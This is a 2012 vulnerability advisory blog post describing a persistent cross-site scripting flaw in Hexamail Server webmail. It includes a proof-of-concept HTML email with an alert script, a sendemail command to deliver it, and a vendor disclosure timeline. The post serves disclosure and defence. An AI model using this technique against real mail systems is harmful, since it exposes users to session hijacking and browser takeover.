Hexamail Server <= 4.4.5 Persistent XSS Vulnerability

Hexamail Server version 4.4.5 or below is vulnerable to a persistent cross-site scripting (XSS) via HTML email.

Vulnerability Description

Hexamail Server suffers persistent XSS vulnerability in the mail body, allowing malicious user to execute scripts in a victim’s browser to hijack user sessions, redirect users, and or hijack the user’s browser.

Proof of concept

By sending a malicious script to the victim email, the webmail automatically load the mail body, so the script will be automatically executed without permission from user.

root@bt:~/# cat &gt; meal.txt
&lt;html&gt;
&lt;body&gt;
&lt;h1&gt;XSS pop up&lt;/h1&gt;
&lt;script&gt;alert('Hi, what is this?');&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
root@bt:~/#

Send email to the victim:

root@bt:~/# sendemail -f bob@example.com -t david@example.com -xu bob@example.com -xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com

Vendor timeline

04/20/2012 – Issue discovered
04/20/2012 – Vendor contacted
04/27/2012 – Vendor respond and provides new upgrade version
04/30/2012 – Issue still affected on the latest upgrade version
04/30/2012 – Vendor said they still fixing the problem
05/10/2012 – Email sent to ask about the fix progress
06/02/2012 – No response. Sent to Secunia.

Solution

Not available.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About Spentera

We are specializing in penetration test, vulnerability assessment, computer forensics, as well as intrusion analyst and malware analysis. Customers can contact us directly at contact[at]spentera[dot]id, or use Contact Our Team menu on the sidebar.